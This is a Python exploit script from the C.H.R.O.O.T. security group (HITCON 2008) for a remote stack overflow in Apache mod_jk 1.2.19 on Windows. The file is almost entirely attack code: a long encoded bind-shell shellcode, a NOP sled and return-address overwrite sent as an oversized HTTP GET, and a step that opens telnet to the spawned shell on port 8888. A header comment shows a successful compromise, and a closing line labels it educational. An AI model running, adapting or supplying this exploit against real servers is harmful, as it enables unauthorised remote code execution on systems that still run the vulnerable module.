#!/usr/bin/python # # _____ _ _ _____ _____ _____ _____ # / ___| |_| | _ \| _ | _ |_ _| # | (___| _ | [_)_/| (_) | (_) | | | # \_____|_| |_|_| |_||_____|_____| |_| # C. H. R. O. O. T. SECURITY GROUP # - -- ----- --- -- -- ---- --- -- - # http://www.chroot.org # # _ _ _ _____ ____ ____ __ _ # Hacks In Taiwan | |_| | |_ _| __| | \| | # Conference 2008 | _ | | | | | (__| () | | # |_| |_|_| |_| \____|____|_|\__| # http://www.hitcon.org # # # Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit # # Author ======:: unohope [at] chroot [dot] org # # IRC =========:: irc.chroot.org #chroot # # ScriptName ==:: Apache Module mod_jk/1.2.19 # # Vendor ======:: http://tomcat.apache.org/ # # Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/ # # Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19 # Apache/2.0.59 (Win32) mod_jk/1.2.19 # # Greets ======:: zha0 # # # [root@wargame tmp]# ./apx-jk_mod-1.2.19 # Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org) # # usage: ./apx-jk_mod-1.2.19 # # [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78 # Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org) # # [+] connecting to 192.168.1.78 ... # # Trying 192.168.1.78... # Connected to 192.168.1.78. # Escape character is '^]'. # Microsoft Windows XP [.. 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\AppServ\Apache2> # # import os, sys, time from socket import * shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68" shellcode += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32" shellcode += "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43" shellcode += "\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71" shellcode += "\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c" shellcode += "\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74" shellcode += "\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66" shellcode += "\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c" shellcode += "\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b" shellcode += "\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79" shellcode += "\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54" shellcode += "\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36" shellcode += "\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30" shellcode += "\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66" shellcode += "\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73" shellcode += "\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b" shellcode += "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63" shellcode += "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a" shellcode += "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f" shellcode += "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73" shellcode += "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c" shellcode += "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70" shellcode += "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61" shellcode += "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33" shellcode += "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32" shellcode += "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e" shellcode += "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39" shellcode += "\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39" shellcode += "\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e" shellcode += "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e" shellcode += "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51" shellcode += "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64" shellcode += "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37" shellcode += "\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70" shellcode += "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e" shellcode += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73" shellcode += "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61" shellcode += "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78" shellcode += "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e" shellcode += "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30" shellcode += "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b" shellcode += "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b" shellcode += "\x4f\x69\x46\x4b\x4f\x6e\x30\x68"; foo_base = 8 buf_base = 4087 buf_offset = foo_base * 11 nop = "\x90" ret = "\xcc\x2a\xd9\x77" buf = nop*foo_base + shellcode + nop*(buf_base - foo_base - len(shellcode) - buf_offset) + ret buf += "\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3" + nop*(buf_offset - foo_base - 3) def usage(): print 'usage: %s \n' % sys.argv[0] sys.exit(-1) def xpl(): try: print len(buf) sockaddr = (host, 80) s = socket(AF_INET, SOCK_STREAM) s.connect(sockaddr) payload = buf + 'HTTP/1.0\r\nHost: %s\r\n\r\n\0' % host s.send('GET /' + payload) s.close() print ' [+] connecting to %s ...\n' % host time.sleep(3) os.system("telnet %s 8888" % host) except: print ' [-] EXPLOIT FAILED!\n' if __name__ == '__main__': print 'Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\n' try: host = sys.argv[1] except IndexError: usage() xpl() # [NOTE] # # !! This is just for educational purposes, DO NOT use for illegal. !! #